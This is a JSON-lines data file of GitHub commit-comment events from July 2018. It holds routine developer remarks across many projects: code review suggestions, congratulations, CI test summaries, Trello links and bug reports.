{"id":"8001156888","type":"CommitCommentEvent","actor":{"login":"francischu"},"repo":{"name":"francischu/test2"},"payload":{"comment":{"id":29794835,"position":null,"line":null,"path":null,"commit_id":"d846fa0fe8eca086b4deac8d9b5df34d5f6613d2","created_at":"2018-07-23T00:43:40Z","updated_at":"2018-07-23T00:43:40Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [代辦事項1](https://trello.com/c/yxnWpDK1/1-%E4%BB%A3%E8%BE%A6%E4%BA%8B%E9%A0%851)"}},"created_at":"2018-07-23T00:43:40Z"}
{"id":"8001160708","type":"CommitCommentEvent","actor":{"login":"villamarinella"},"repo":{"name":"neverlocateme/imagefap-dl-cli"},"payload":{"comment":{"id":29794842,"position":null,"line":null,"path":null,"commit_id":"737b03df1e5590f34056f87a2c25bfbb543663b8","created_at":"2018-07-23T00:45:56Z","updated_at":"2018-07-23T00:45:56Z","author_association":"NONE","body":"it stores only html files, no pics.\r\nttp://www.imagefap.com/gallery.php?gid=6548919\r\n"}},"created_at":"2018-07-23T00:45:56Z"}
{"id":"8001161730","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"double-beep/Stockfish"},"payload":{"comment":{"id":29794847,"position":null,"line":null,"path":null,"commit_id":"613dbbafa1481b6409b46ffd1f3a1ef0ea286f11","created_at":"2018-07-23T00:46:35Z","updated_at":"2018-07-23T00:46:35Z","author_association":"NONE","body":"Congratulations!"}},"created_at":"2018-07-23T00:46:35Z"}
{"id":"8001162737","type":"CommitCommentEvent","actor":{"login":"Js41637"},"repo":{"name":"SchizoDuckie/DuckieTV"},"payload":{"comment":{"id":29794848,"position":null,"line":null,"path":null,"commit_id":"30b8da12b8d4498d9f736472a8a00146438cf114","created_at":"2018-07-23T00:47:17Z","updated_at":"2018-07-23T00:47:17Z","author_association":"COLLABORATOR","body":"The reason it happens is because the other two `calendar-event`s have a `filterEvents` in the ng-repeat which filters out hidden series. This one doesn't because it's not an ng-repeat, it's a single calendar event so it doesn't get filtered out."}},"created_at":"2018-07-23T00:47:17Z"}
{"id":"8001163012","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"double-beep/Stockfish"},"payload":{"comment":{"id":29794850,"position":null,"line":null,"path":null,"commit_id":"613dbbafa1481b6409b46ffd1f3a1ef0ea286f11","created_at":"2018-07-23T00:47:28Z","updated_at":"2018-07-23T00:47:28Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-23T00:47:28Z"}
{"id":"8001163383","type":"CommitCommentEvent","actor":{"login":"miguel-l"},"repo":{"name":"double-beep/Stockfish"},"payload":{"comment":{"id":29794854,"position":null,"line":null,"path":null,"commit_id":"0b19dfd3c62937f82f5bd52f57f198300a12052c","created_at":"2018-07-23T00:47:43Z","updated_at":"2018-07-23T00:47:43Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-23T00:47:43Z"}
{"id":"8001167144","type":"CommitCommentEvent","actor":{"login":"favonia"},"repo":{"name":"liyishuai/coq-http2"},"payload":{"comment":{"id":29794858,"position":94,"line":94,"path":"src/HPACK/HPACKTypes.v","commit_id":"88963344e21b9e62e2f23aa09b58b91437331936","created_at":"2018-07-23T00:50:16Z","updated_at":"2018-07-23T00:50:16Z","author_association":"COLLABORATOR","body":"I see! Thanks."}},"created_at":"2018-07-23T00:50:16Z"}
{"id":"8001173053","type":"CommitCommentEvent","actor":{"login":"HKyuan"},"repo":{"name":"HKyuan/vghtc"},"payload":{"comment":{"id":29794861,"position":null,"line":null,"path":null,"commit_id":"af8a2fa4ba921f00a747962001ad6dd6ee7dc287","created_at":"2018-07-23T00:53:59Z","updated_at":"2018-07-23T00:53:59Z","author_association":"OWNER","body":"asassasaas"}},"created_at":"2018-07-23T00:53:59Z"}
{"id":"8001173158","type":"CommitCommentEvent","actor":{"login":"jcereced"},"repo":{"name":"Wireless-Innovation-Forum/Spectrum-Access-System"},"payload":{"comment":{"id":29794862,"position":null,"line":null,"path":null,"commit_id":"373a2ccbb674feacc072c964c0c11b401d0d06a6","created_at":"2018-07-23T00:54:04Z","updated_at":"2018-07-23T00:54:04Z","author_association":"CONTRIBUTOR","body":"changing SAS TH cert on FAD2 to correct sas.cert instead of server.cert"}},"created_at":"2018-07-23T00:54:04Z"}
{"id":"8001178467","type":"CommitCommentEvent","actor":{"login":"gengjiawen"},"repo":{"name":"HcySunYang/vue-design"},"payload":{"comment":{"id":29794876,"position":44,"line":750,"path":"docs/art/83vue-parsing-2.md","commit_id":"fd6613c9255b025625022ef54a201d05a09e5ab3","created_at":"2018-07-23T00:57:10Z","updated_at":"2018-07-23T00:57:10Z","author_association":"CONTRIBUTOR","body":"这个应该就是`类似的`的吧"}},"created_at":"2018-07-23T00:57:10Z"}
{"id":"8001185069","type":"CommitCommentEvent","actor":{"login":"hnkjxy-acm"},"repo":{"name":"hnkjxy-acm/hnkjxy-acm.github.io"},"payload":{"comment":{"id":29794890,"position":null,"line":null,"path":null,"commit_id":"34db90e420db197fce08c55060546047869dde69","created_at":"2018-07-23T01:01:06Z","updated_at":"2018-07-23T01:01:06Z","author_association":"OWNER","body":" hnkjxy-acm.top"}},"created_at":"2018-07-23T01:01:06Z"}
{"id":"8001190857","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29794904,"position":null,"line":null,"path":null,"commit_id":"7dfcb8f4f4462cffd815321dc87582f879a72ac3","created_at":"2018-07-23T01:03:51Z","updated_at":"2018-07-23T01:03:51Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-service](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-service).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-service-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-23T01:03:51Z"}
{"id":"8001192343","type":"CommitCommentEvent","actor":{"login":"Cobi"},"repo":{"name":"TableflippersAnonymous/v1x1"},"payload":{"comment":{"id":29794905,"position":null,"line":null,"path":null,"commit_id":"378da1dae470c1bffab52a8413e94c2437148420","created_at":"2018-07-23T01:04:45Z","updated_at":"2018-07-23T01:04:45Z","author_association":"MEMBER","body":"|`v1x1-common/src/main/java/tv/v1x1/common/services/discord/dto/channel/Channel.java:6`|\n|---|\nRemove unused import."}},"created_at":"2018-07-23T01:04:45Z"}
{"id":"8001194533","type":"CommitCommentEvent","actor":{"login":"CuddleBear92"},"repo":{"name":"CuddleBear92/Hydrus-Presets-and-Scripts"},"payload":{"comment":{"id":29794907,"position":null,"line":null,"path":null,"commit_id":"d85f445c94ffd59d2e6fe745fe944f2be478b643","created_at":"2018-07-23T01:05:57Z","updated_at":"2018-07-23T01:05:57Z","author_association":"OWNER","body":"url classes crashes with the normal 8ch class. unsure how to fix this one @rachmadaniHaryono \r\nhad to stop using it on the client as it was interfering with the other class (forgot to check)"}},"created_at":"2018-07-23T01:05:57Z"}
{"id":"8001197446","type":"CommitCommentEvent","actor":{"login":"oblakeerickson"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29794909,"position":null,"line":null,"path":null,"commit_id":"37b726982d0cc8af21705f6acf1a76f3a0f4a6a1","created_at":"2018-07-23T01:07:43Z","updated_at":"2018-07-23T01:07:43Z","author_association":"MEMBER","body":"Yea probably should. I’ll add one.\n\nOn Sun, Jul 22, 2018 at 6:02 PM Guo Xiang Tan <notifications@github.com>\nwrote:\n\n> @oblakeerickson <https://github.com/oblakeerickson> I think we need to\n> add a spec.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/discourse/discourse/commit/37b726982d0cc8af21705f6acf1a76f3a0f4a6a1#commitcomment-29794716>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABa-QAlaUesXHqTlqKWzVp7FLK2xSI41ks5uJRKjgaJpZM4VaNDa>\n> .\n>\n"}},"created_at":"2018-07-23T01:07:43Z"}
{"id":"8001198389","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29794911,"position":null,"line":null,"path":null,"commit_id":"12d299752648c648f32f0b12e43b18e8810207e8","created_at":"2018-07-23T01:08:17Z","updated_at":"2018-07-23T01:08:17Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.367`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/406957700) :tada:"}},"created_at":"2018-07-23T01:08:17Z"}
{"id":"8001203758","type":"CommitCommentEvent","actor":{"login":"Awsome-Areej"},"repo":{"name":"Awsome-Areej/Python-Jokes"},"payload":{"comment":{"id":29794915,"position":null,"line":null,"path":null,"commit_id":"26a2e7be597759de8f7d9cfd564e252776953a08","created_at":"2018-07-23T01:11:16Z","updated_at":"2018-07-23T01:11:16Z","author_association":"OWNER","body":"Most of the code is for the animal part but a quarter or less is for the manufactured part!"}},"created_at":"2018-07-23T01:11:16Z"}
{"id":"8001206357","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29794924,"position":26,"line":26,"path":"bears/vcs/git/GitCommitMetadataBear.py","commit_id":"037acfaeafbb5ec80e242b9c1395d06359748b9e","created_at":"2018-07-23T01:12:53Z","updated_at":"2018-07-23T01:12:53Z","author_association":"NONE","body":"`get_head_commit_sha()` should do this. Move this logic (`.strip('\\n')`) to `get_head_commit_sha()`.\r\n\r\n`get_head_commit_sha()` should return a _ready-to-use_ sha string"}},"created_at":"2018-07-23T01:12:53Z"}
{"id":"8001209668","type":"CommitCommentEvent","actor":{"login":"Awsome-Areej"},"repo":{"name":"Awsome-Areej/Python-Jokes"},"payload":{"comment":{"id":29794928,"position":null,"line":null,"path":null,"commit_id":"26a2e7be597759de8f7d9cfd564e252776953a08","created_at":"2018-07-23T01:14:44Z","updated_at":"2018-07-23T01:14:44Z","author_association":"OWNER","body":"Make your own riddle and tell it to your friends!"}},"created_at":"2018-07-23T01:14:44Z"}
{"id":"8001211552","type":"CommitCommentEvent","actor":{"login":"Cobi"},"repo":{"name":"TableflippersAnonymous/v1x1"},"payload":{"comment":{"id":29794933,"position":20,"line":0,"path":"v1x1-common/src/main/java/tv/v1x1/common/util/GoGetter.java","commit_id":"0205a178dc884898fb9efef06bf3855274b30558","created_at":"2018-07-23T01:15:44Z","updated_at":"2018-07-23T01:15:44Z","author_association":"MEMBER","body":"Perhaps clean it up a bit with `Optional`\n```\nreturn Optional.ofNullable(daoTenant.getChannel(platform, channelId))\n    .map(channel -> channel.toCore(daoTenant))\n    .orElseThrow(() -> new NoSuchThingException(\"Channel not known\"));\n```"}},"created_at":"2018-07-23T01:15:44Z"}
{"id":"8001215582","type":"CommitCommentEvent","actor":{"login":"josimarmiguel03"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29794940,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T01:17:44Z","updated_at":"2018-07-23T01:17:44Z","author_association":"NONE","body":"vey good"}},"created_at":"2018-07-23T01:17:44Z"}
{"id":"8001215688","type":"CommitCommentEvent","actor":{"login":"Cobi"},"repo":{"name":"TableflippersAnonymous/v1x1"},"payload":{"comment":{"id":29794941,"position":16,"line":0,"path":"v1x1-common/src/main/java/tv/v1x1/common/util/GoGetter.java","commit_id":"0205a178dc884898fb9efef06bf3855274b30558","created_at":"2018-07-23T01:17:48Z","updated_at":"2018-07-23T01:17:48Z","author_association":"MEMBER","body":"Perhaps consider moving these into the relevant `DAO` objects?"}},"created_at":"2018-07-23T01:17:48Z"}
{"id":"8001219164","type":"CommitCommentEvent","actor":{"login":"gautamvenkaat"},"repo":{"name":"gautamvenkaat/f"},"payload":{"comment":{"id":29794948,"position":null,"line":null,"path":null,"commit_id":"5928c4b0a4f2214ccb96fc53d0561113a7c5c767","created_at":"2018-07-23T01:19:44Z","updated_at":"2018-07-23T01:19:44Z","author_association":"OWNER","body":"cvb"}},"created_at":"2018-07-23T01:19:44Z"}
{"id":"8001221088","type":"CommitCommentEvent","actor":{"login":"Coldzer0"},"repo":{"name":"Coldzer0/unicorn-engine-pascal"},"payload":{"comment":{"id":29794951,"position":null,"line":null,"path":null,"commit_id":"41e582baa501b01489b41575e8d15d8cfb006acb","created_at":"2018-07-23T01:20:44Z","updated_at":"2018-07-23T01:20:44Z","author_association":"OWNER","body":"this's to fix \"FreePascal Error: Data element too large\""}},"created_at":"2018-07-23T01:20:44Z"}
{"id":"8001221525","type":"CommitCommentEvent","actor":{"login":"MaximRouiller"},"repo":{"name":"cecilphillip/blog.decayingcode.com"},"payload":{"comment":{"id":29794953,"position":null,"line":null,"path":null,"commit_id":"5268d3a4b516ab68e9afa58171db4588bb41b7fa","created_at":"2018-07-23T01:20:56Z","updated_at":"2018-07-23T01:20:56Z","author_association":"NONE","body":"I'm ready to merge this when you are. 😄 "}},"created_at":"2018-07-23T01:20:56Z"}
{"id":"8001224249","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29794954,"position":21,"line":21,"path":"bears/vcs/git/GitCommitMetadataBear.py","commit_id":"037acfaeafbb5ec80e242b9c1395d06359748b9e","created_at":"2018-07-23T01:22:13Z","updated_at":"2018-07-23T01:22:13Z","author_association":"NONE","body":"`run_shell_command` returns a tuple that contains stdout and stderr.\r\nGet the commit SHA from the `stdout` and return it.\r\n\r\nIf there's something in the `stderr` do `self.err` then raise an `RuntimeError` exception "}},"created_at":"2018-07-23T01:22:13Z"}
{"id":"8001239000","type":"CommitCommentEvent","actor":{"login":"jodiegardiner"},"repo":{"name":"derilinx/ckanext-dcat"},"payload":{"comment":{"id":29794976,"position":null,"line":null,"path":null,"commit_id":"2d4fd8a4e868812e607b39eb751ae6c6a35953f4","created_at":"2018-07-23T01:30:16Z","updated_at":"2018-07-23T01:30:16Z","author_association":"CONTRIBUTOR","body":"Thank you for this :)  This was quite noisy."}},"created_at":"2018-07-23T01:30:16Z"}
{"id":"8001246950","type":"CommitCommentEvent","actor":{"login":"jianlaipinan"},"repo":{"name":"jianlaipinan/carn"},"payload":{"comment":{"id":29794984,"position":null,"line":null,"path":null,"commit_id":"e0c2b24cfaee376ef3d821195ecda01b87533d81","created_at":"2018-07-23T01:34:34Z","updated_at":"2018-07-23T01:34:34Z","author_association":"OWNER","body":"这是在页面上comment"}},"created_at":"2018-07-23T01:34:34Z"}
{"id":"8001246982","type":"CommitCommentEvent","actor":{"login":"ryalanms"},"repo":{"name":"ryalanms/WindowsCommunityToolkit"},"payload":{"comment":{"id":29794985,"position":5,"line":39,"path":"Microsoft.Toolkit.Win32/Microsoft.Windows.Interop.Sample/Microsoft.Windows.Interop.Sample.csproj","commit_id":"a00d2ec0a62f6a566c64cfbc37a9a8f587480832","created_at":"2018-07-23T01:34:36Z","updated_at":"2018-07-23T01:34:36Z","author_association":"OWNER","body":"These all need to be fixed.  "}},"created_at":"2018-07-23T01:34:36Z"}
{"id":"8001247613","type":"CommitCommentEvent","actor":{"login":"ryalanms"},"repo":{"name":"ryalanms/WindowsCommunityToolkit"},"payload":{"comment":{"id":29794986,"position":6,"line":6,"path":"Microsoft.Toolkit.Win32/Microsoft.Windows.Interop.WindowsXamlHost/WPF/Microsoft.Windows.Interop.WPF.csproj","commit_id":"a00d2ec0a62f6a566c64cfbc37a9a8f587480832","created_at":"2018-07-23T01:34:58Z","updated_at":"2018-07-23T01:34:58Z","author_association":"OWNER","body":"This needs to be turned back on. "}},"created_at":"2018-07-23T01:34:58Z"}
{"id":"8001247868","type":"CommitCommentEvent","actor":{"login":"ryalanms"},"repo":{"name":"ryalanms/WindowsCommunityToolkit"},"payload":{"comment":{"id":29794987,"position":15,"line":55,"path":"Microsoft.Toolkit.Win32/Microsoft.Windows.Interop.WindowsXamlHost/WPF/Microsoft.Windows.Interop.WPF.csproj","commit_id":"a00d2ec0a62f6a566c64cfbc37a9a8f587480832","created_at":"2018-07-23T01:35:06Z","updated_at":"2018-07-23T01:35:06Z","author_association":"OWNER","body":"Fix."}},"created_at":"2018-07-23T01:35:06Z"}
{"id":"8001249507","type":"CommitCommentEvent","actor":{"login":"alexis0227"},"repo":{"name":"ICObench/data-api"},"payload":{"comment":{"id":29794990,"position":21,"line":21,"path":"ICObenchAPIpy3.py","commit_id":"fad500da16ee252f0deb946354cbefcff0d7b4a2","created_at":"2018-07-23T01:35:58Z","updated_at":"2018-07-23T01:35:58Z","author_association":"NONE","body":"Hi \r\nI'm using Anaconda Python 3.6. \r\nI'm wondering why 'sign=hash.digest()' is not working. \r\nPython says, it is invalid syntax. \r\n"}},"created_at":"2018-07-23T01:35:58Z"}
{"id":"8001249541","type":"CommitCommentEvent","actor":{"login":"szymczdm"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29794991,"position":6,"line":22,"path":"code/drasil-lang/Language/Drasil/Printing/LayoutObj.hs","commit_id":"c775812d0e354286d65706b405e7bbb5076b08d2","created_at":"2018-07-23T01:35:59Z","updated_at":"2018-07-23T01:35:59Z","author_association":"COLLABORATOR","body":"I believe we had a discussion about this before you left and decided this was the way to go. @niazim3 can confirm. However, I will say that I agree `Paragraph` is overkill. I think there's a good argument to keep `EqnBlock`, and maybe an argument for `List`. We should discuss it."}},"created_at":"2018-07-23T01:35:59Z"}
{"id":"8001255632","type":"CommitCommentEvent","actor":{"login":"Dember224"},"repo":{"name":"Dember224/conspire"},"payload":{"comment":{"id":29794998,"position":27,"line":27,"path":"src/components/participant.js","commit_id":"ff6884f01f828b9e20ce8fa76a6e4826cc74e6e5","created_at":"2018-07-23T01:39:09Z","updated_at":"2018-07-23T01:39:09Z","author_association":"OWNER","body":"Thanks Justin!\r\n\r\nReact tells me I can't use an object as a value for the score key. I also tried to pass the player number as an array and it didn't work. I'm going to create a playerNumber state and see if I can use a ternary operator to only increase score if the correct player is pressing the button. "}},"created_at":"2018-07-23T01:39:09Z"}
{"id":"8001256512","type":"CommitCommentEvent","actor":{"login":"renahnschultz"},"repo":{"name":"renahnschultz/odonto-system-manager"},"payload":{"comment":{"id":29794999,"position":null,"line":null,"path":null,"commit_id":"4ef5a25ee777f514bf1145737b82439b2096bd29","created_at":"2018-07-23T01:39:36Z","updated_at":"2018-07-23T01:39:36Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Cadastro de serviços.](https://trello.com/c/uPpyVSkN/1-cadastro-de-servi%C3%A7os)"}},"created_at":"2018-07-23T01:39:36Z"}
{"id":"8001260606","type":"CommitCommentEvent","actor":{"login":"macrocosme"},"repo":{"name":"vispy/vispy"},"payload":{"comment":{"id":29795004,"position":null,"line":null,"path":null,"commit_id":"27ef08ec580372880bebb8d69e4de354bcd8a2ae","created_at":"2018-07-23T01:41:39Z","updated_at":"2018-07-23T01:41:39Z","author_association":"CONTRIBUTOR","body":"It seems like this commit introduced some issues with texture. I currently get the following error related to `$cmap` in the shader when I load a volume with this code derived from `VolumeVisual` (https://github.com/macrocosme/shwirl/blob/dev-no-extern/shwirl/visual/render_volume.py): \r\n\r\n```\r\nRuntimeError: Program validation error:\r\nValidation Failed: Sampler error:\r\n  Samplers of different types use the same texture image unit.\r\n   - or -\r\n  A sampler's texture unit is out of range (greater than max allowed or negative).\r\nERROR: Invoking <bound method SceneCanvas.on_draw of <Canvas3D (PyQt5) at 0x109e8dd68>> for DrawEvent\r\n```\r\n\r\nI imagine I have to change something in my code to make it compliant with this change, but I am not yet sure what needs to be done. \r\n\r\nIf you have any insights, please let me know. \r\n\r\nThanks. "}},"created_at":"2018-07-23T01:41:39Z"}
{"id":"8001262637","type":"CommitCommentEvent","actor":{"login":"KatsunoriHatakeyama"},"repo":{"name":"KatsunoriHatakeyama/test"},"payload":{"comment":{"id":29795006,"position":null,"line":null,"path":null,"commit_id":"22ac63c47de23266d3e0d8caca21b606b971e0a0","created_at":"2018-07-23T01:42:40Z","updated_at":"2018-07-23T01:42:40Z","author_association":"OWNER","body":"OKいいよ"}},"created_at":"2018-07-23T01:42:40Z"}
{"id":"8001272397","type":"CommitCommentEvent","actor":{"login":"monmon-dotdev"},"repo":{"name":"dotdevv/php-developer-assessment"},"payload":{"comment":{"id":29795015,"position":80,"line":80,"path":"shopifyCustomerDelete/DeleteShopifyCustomers.php","commit_id":"5fc320b1caf856df47fe48338622d74c0897d2da","created_at":"2018-07-23T01:47:37Z","updated_at":"2018-07-23T01:47:37Z","author_association":"NONE","body":"@ivan-dotdev Better to use a param to pass filePath to increase flexibility of your code :)"}},"created_at":"2018-07-23T01:47:37Z"}
{"id":"8001273189","type":"CommitCommentEvent","actor":{"login":"monmon-dotdev"},"repo":{"name":"dotdevv/php-developer-assessment"},"payload":{"comment":{"id":29795017,"position":59,"line":59,"path":"shopifyCustomerDelete/DeleteShopifyCustomers.php","commit_id":"5fc320b1caf856df47fe48338622d74c0897d2da","created_at":"2018-07-23T01:48:03Z","updated_at":"2018-07-23T01:48:03Z","author_association":"NONE","body":"@ivan-dotdev Lack of enough information for your error log. e.g. customer ID"}},"created_at":"2018-07-23T01:48:03Z"}
{"id":"8001273327","type":"CommitCommentEvent","actor":{"login":"DouglasDeveloperApp"},"repo":{"name":"DouglasDeveloperApp/SpringBoot-MongoDB"},"payload":{"comment":{"id":29795018,"position":null,"line":null,"path":null,"commit_id":"b9f30351259c8c8e5c6d1e192181b88d37dff5f8","created_at":"2018-07-23T01:48:08Z","updated_at":"2018-07-23T01:48:08Z","author_association":"OWNER","body":"Conectado ao MongoDB com repository e service OK"}},"created_at":"2018-07-23T01:48:08Z"}
{"id":"8001274575","type":"CommitCommentEvent","actor":{"login":"monmon-dotdev"},"repo":{"name":"dotdevv/php-developer-assessment"},"payload":{"comment":{"id":29795019,"position":1,"line":1,"path":"readExcel/.idea/workspace.xml","commit_id":"5fc320b1caf856df47fe48338622d74c0897d2da","created_at":"2018-07-23T01:48:43Z","updated_at":"2018-07-23T01:48:43Z","author_association":"NONE","body":"@ivan-dotdev This file shouldn't be pushed out, this is not project-related."}},"created_at":"2018-07-23T01:48:43Z"}
{"id":"8001277635","type":"CommitCommentEvent","actor":{"login":"monmon-dotdev"},"repo":{"name":"dotdevv/php-developer-assessment"},"payload":{"comment":{"id":29795023,"position":null,"line":null,"path":null,"commit_id":"5fc320b1caf856df47fe48338622d74c0897d2da","created_at":"2018-07-23T01:50:14Z","updated_at":"2018-07-23T01:50:14Z","author_association":"NONE","body":"@ivan-dotdev Choose a better branch name which can indicate the functionality/feature in the branch.\r\nFor example: **feature-delete-shopify-customer** instead of just **ivan**"}},"created_at":"2018-07-23T01:50:14Z"}
{"id":"8001289443","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29795034,"position":null,"line":null,"path":null,"commit_id":"d7413d4149a5778f958907ee4b4fa40d5bd7cea7","created_at":"2018-07-23T01:55:48Z","updated_at":"2018-07-23T01:55:48Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-MacOS-10.9-clang: OK (2941 of 2944 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 620\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7413d4149a5778f958907ee4b4fa40d5bd7cea7-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7413d4149a5778f958907ee4b4fa40d5bd7cea7-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-23T01:55:48Z"}
{"id":"8001291444","type":"CommitCommentEvent","actor":{"login":"djhoese"},"repo":{"name":"vispy/vispy"},"payload":{"comment":{"id":29795037,"position":null,"line":null,"path":null,"commit_id":"27ef08ec580372880bebb8d69e4de354bcd8a2ae","created_at":"2018-07-23T01:56:43Z","updated_at":"2018-07-23T01:56:43Z","author_association":"CONTRIBUTOR","body":"@macrocosme Could you please make a separate issue for this and include a standalone independent example that produces this example? However, my best guess is that since you are customizing your own Visual based off a previous visual you should be able to copy the changes made to ImageVisual and migrate them to your custom visual. Mainly the use of `cmap`. If you make a separate issue then we may be able to walk through your debug process as you fix your custom visual. Lastly, if your custom visual is something that could be useful to others, what do you think about adding it to vispy?"}},"created_at":"2018-07-23T01:56:43Z"}
{"id":"8001294755","type":"CommitCommentEvent","actor":{"login":"nashif"},"repo":{"name":"zephyrproject-rtos/zephyr"},"payload":{"comment":{"id":29795040,"position":4,"line":355,"path":"CMakeLists.txt","commit_id":"e6bf79b0c28048708aa4e7776cd457f525c16037","created_at":"2018-07-23T01:58:21Z","updated_at":"2018-07-23T01:58:21Z","author_association":"MEMBER","body":"> previous implementation (i. e. 909dd7) had version_header.h and version.c specific to the board (i. e arduino_101). I thought of making it generic and couldn't find right placeholder to have the version related files. So decided to generate version_header.h .\r\n\r\nI still do not see any reason why this needs to be autogeneated, we are introducing complexity for no good reason, just have this file in the tree. No need to autogenerate if you are going to just dump text into a file, autogeneration is only required when the file content is dynamic"}},"created_at":"2018-07-23T01:58:21Z"}
{"id":"8002906397","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29798163,"position":70,"line":54,"path":"contracts/Splitter.sol","commit_id":"aaaa66cb459d8ce34988b5c2b77863872d296942","created_at":"2018-07-23T10:01:54Z","updated_at":"2018-07-23T10:01:54Z","author_association":"NONE","body":"Imagine you had the function:\r\n\r\n```solidity\r\nfunction setBenefactor(address newBenefactor) {\r\n    benefactor = newBenefactor;\r\n}\r\n```\r\nNow the following transactions take place:\r\n\r\n* `benefactor1` is the current `benefactor`\r\n* someone sends odd value to split\r\n* `LogAccumulatedRemainder` is emitted, we **know** it is for `benefactor1`\r\n* `benefactor` is changed to `benefactor2`\r\n* someone sends odd value to split\r\n* `LogAccumulatedRemainder` is emitted, we **know** it is for `benefactor2`\r\n\r\nYes, we **know** but that is not good enough. How about the event makes this explicit?"}},"created_at":"2018-07-23T10:01:54Z"}
{"id":"8002906463","type":"CommitCommentEvent","actor":{"login":"PedjaHC"},"repo":{"name":"PedjaHC/TheFirstOne"},"payload":{"comment":{"id":29798164,"position":null,"line":null,"path":null,"commit_id":"697d2d085efa9f56ad183f9ee637cb20b6e73d93","created_at":"2018-07-23T10:01:54Z","updated_at":"2018-07-23T10:01:54Z","author_association":"OWNER","body":"Prihvacece promene"}},"created_at":"2018-07-23T10:01:54Z"}
{"id":"8002907599","type":"CommitCommentEvent","actor":{"login":"jemmy858585"},"repo":{"name":"Mellanox/qemu"},"payload":{"comment":{"id":29798168,"position":null,"line":null,"path":null,"commit_id":"c975a3e20da20989f6cd2291196ae69a63618afd","created_at":"2018-07-23T10:02:09Z","updated_at":"2018-07-23T10:02:09Z","author_association":"COLLABORATOR","body":"Yes, this patch will also apply for precopy.\r\nThanks."}},"created_at":"2018-07-23T10:02:09Z"}
{"id":"8002911775","type":"CommitCommentEvent","actor":{"login":"Lexer747"},"repo":{"name":"Lexer747/PingPlotter"},"payload":{"comment":{"id":29798179,"position":null,"line":null,"path":null,"commit_id":"e96eb15cc8c4ea833f892751f2f0b93345fa11f9","created_at":"2018-07-23T10:02:58Z","updated_at":"2018-07-23T10:02:58Z","author_association":"OWNER","body":"💯 "}},"created_at":"2018-07-23T10:02:58Z"}
{"id":"8002912248","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29798183,"position":9,"line":20,"path":"5-12.cpp","commit_id":"dcb9594bb0620feaefbd2c0a6fbf23a8e4ae1bd4","created_at":"2018-07-23T10:03:03Z","updated_at":"2018-07-23T10:03:03Z","author_association":"COLLABORATOR","body":"5*6*4が正答ですが、そう出力されていますか？(石井)"}},"created_at":"2018-07-23T10:03:03Z"}
{"id":"8002917674","type":"CommitCommentEvent","actor":{"login":"andyli"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":29798193,"position":null,"line":null,"path":null,"commit_id":"b57701141108cfe066813ad344ce230d3573a187","created_at":"2018-07-23T10:04:10Z","updated_at":"2018-07-23T10:04:10Z","author_association":"MEMBER","body":"The SauceLabs tests failed but I cannot reproduce it... I will look into it soon."}},"created_at":"2018-07-23T10:04:10Z"}
{"id":"8002921674","type":"CommitCommentEvent","actor":{"login":"modmuss50"},"repo":{"name":"TechReborn/TechReborn"},"payload":{"comment":{"id":29798199,"position":13,"line":136,"path":"src/main/java/techreborn/blocks/BlockRubberLeaves.java","commit_id":"b3002b6f57f13639380df009315f0aab860900bc","created_at":"2018-07-23T10:04:58Z","updated_at":"2018-07-23T10:04:58Z","author_association":"MEMBER","body":"This needs to be reverted it as you no longer return if the side should be rendered or not when the leaves arent fancy.\r\n\r\nThis will cause performance issues"}},"created_at":"2018-07-23T10:04:58Z"}
